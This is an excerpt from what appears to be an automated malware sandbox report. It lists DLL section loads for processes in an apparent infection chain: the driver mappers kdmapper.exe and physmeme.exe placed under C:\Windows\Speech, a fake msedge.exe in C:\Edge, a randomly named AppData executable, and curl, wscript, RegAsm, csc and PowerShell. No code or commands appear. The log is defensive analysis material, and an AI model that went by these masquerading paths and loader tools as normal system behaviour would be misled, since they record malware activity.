Source: C:\Windows\Speech\kdmapper.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
